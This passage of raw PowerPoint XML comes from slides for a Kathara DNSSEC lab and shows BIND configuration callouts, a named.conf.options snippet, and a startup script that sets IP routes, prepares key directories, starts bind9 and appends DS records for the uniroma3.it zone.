            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>enable "inline signature".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5293C90B-44DD-DD35-F82E-2CDF8D063934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124380" y="1675313"/>
            <a:ext cx="1918176" cy="1550954"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88294"/>
              <a:gd name="adj2" fmla="val 38616"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>declares that this server is the master (primary) for this zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F612E8-2FAB-EDAD-D4A7-5497ADAF3246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20458" y="3705859"/>
            <a:ext cx="2311610" cy="1550955"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 69528"/>
              <a:gd name="adj2" fmla="val -70919"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Indicates the path to the text file containing the DNS records for the zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277671322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8C1DEF-259A-9C63-CAA3-C5B077C6E359}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1232B1-1A5E-8714-A73E-DF5B10F2F8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B798E886-07E0-264F-6F06-664834E62825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0ED7B49-CB4D-C832-A6AE-FF84E26F9E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC983A7B-8EFE-2410-AD38-BC4FBC54E075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442148"/>
            <a:ext cx="7087578" cy="1973704"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C7CEA44-4610-BB8B-675E-E9A5CC89EA87}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory “/var/cache/bind”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-query {any; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    recursion no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E6AB85C-885C-79E7-4D12-FD8DE6069F2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3837" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62209903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DB0976-874C-E9E7-C09B-B1B3BFDB4654}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FB7B57-CAB8-D6B7-4561-F026276F1AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="514597" y="1138080"/>
            <a:ext cx="11336587" cy="5000627"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9171" cy="1761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54689BD7-574E-2EAC-39BE-8E50053CF955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9171" cy="1703"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 10.0.3.10/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 110.0.0.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 210.0.3.0/24 via 10.0.3.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 200.1.1.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add 195.0.10.0/24 via 10.0.3.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  while ! dig @110.0.0.10 uniroma3.it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  dig @110.0.0.10 uniroma3.it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - uniroma3.it &gt;&gt; /etc/bind/db.it</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
